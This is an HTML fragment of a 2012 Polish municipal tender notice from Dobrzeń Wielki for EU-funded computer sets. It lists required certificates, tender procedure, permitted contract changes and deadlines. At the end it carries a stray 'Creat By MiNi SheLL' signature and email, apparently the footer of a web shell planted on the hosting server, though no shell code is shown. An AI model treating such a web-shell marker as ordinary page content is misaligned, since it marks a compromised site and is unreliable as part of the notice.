<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W celu potwierdzenia, że oferowane dostawy (sprzęt/urządzenia) odpowiadają 
wymaganiom określonym przez zamawiającego, do oferty należy dołączyć :
Certyfikat ISO9001:2000  dla producenta sprzętu,
Certyfikat ISO 14001 dla producenta sprzętu,
Oferowane modele komputerów muszą posiadać certyfikat Microsoft,
potwierdzający poprawną współpracę oferowanych modeli komputerów z 
systemem operacyjnym Windows 7 32bit/64bit (załączyć wydruk ze strony           Microsoft WHCL)
Deklaracja zgodności CE 
Potwierdzenie spełnienia kryteriów środowiskowych, w tym zgodności z 
dyrektywą RoHS Unii Europejskiej o eliminacji substancji niebezpiecznych w
postaci oświadczenia producenta jednostki
Certyfikat EnergyStar 5.0 - komputer musi znajdować się na liście zgodności
dostępnej na stronie www.energystar.gov oraz http://www.eu-energystar.org</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony formularz oferta.
2.Pełnomocnictwo jeżeli dotyczy.
3. Projekt umowy wraz z załącznikami.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień Umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy jest możliwa jedynie w razie wystąpienia chociażby jednej z poniższych okoliczności:
a)gdy zmiana sposobu realizacji zamówienia będzie wynikać ze zmian 
w obowiązujących przepisach prawa bądź wytycznych mających wpływ na realizację przedmiotu Umowy,
b)zmiany sposobu spełnienia świadczenia - na skutek niedostępności na
rynku materiałów/urządzeń wskazanych w ofercie spowodowanych zaprzestaniem produkcji lub wycofaniem z rynku tych materiałów/urządzeń lub pojawienia się na rynku materiałów/urządzeń nowej generacji albo nowych technologii - zmiana sprzętu na równoważną lub o lepszych parametrach za cenę nie wyższą niż podana w ofercie,
c)zmiany parametrów technicznych sprzętu, dopuszcza się je tylko w
przypadkach, gdy proponowane rozwiązania są równorzędne lub lepsze od tych, jakie zostały przewidziane w umowie i opisie przedmiotu zamówienia, jeśli nie powodują zwiększenia wynagrodzenia Wykonawcy,
d)zmiana terminu wykonania umowy w przypadku zaistnienia okoliczności niezależnych od wykonawcy takich jak: zdarzenia losowe, katastrofy itp. mających bezpośredni wpływ na terminowość wykonania zamówienia 
e)zmiany w wyniku okoliczności o charakterze organizacyjnym, których Zamawiający nie mógł przewidzieć na etapie podpisywania umowy w szczególności: kwestie związane  z dostawą zestawów komputerowych do uczestników projektu i ich instalacją oraz podłączeniem internetu</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dobrzenwielki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Dobrzeniu Wielkim ul.Namysłoawska 44 pok.nr 8.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.09.2012 godzina 10:00, miejsce: Urząd Gminy w Dobrzeniu Wielkim 
ul.Namysłowska 44 pok. nr 101.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 26.10.2012.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Specyfikacja istotnych warunków zamówienia będzie dostępna na stronie internetowej zamawiającego www.dobrzenwielki.pl. Na tej stronie będą również zamieszczone pytania i odpowiedzi, modyfikacje SIWZ, odwołania dotyczące treści ogłoszenia oraz postanowień warunków zamówienia, ogłoszenia o wyborze najkorzystniejszej oferty.
Projekt współfinansowany przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Innowacyjna Gospodarka 2007 - 2013  Dotacje na Innowacje    Inwestujemy w Waszą przyszłość  Internet dla dzieci - przeciwdziałanie wykluczeniu cyfrowemu w Gminie Dobrzeń Wielki POIG.08.0300-16-133/11.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com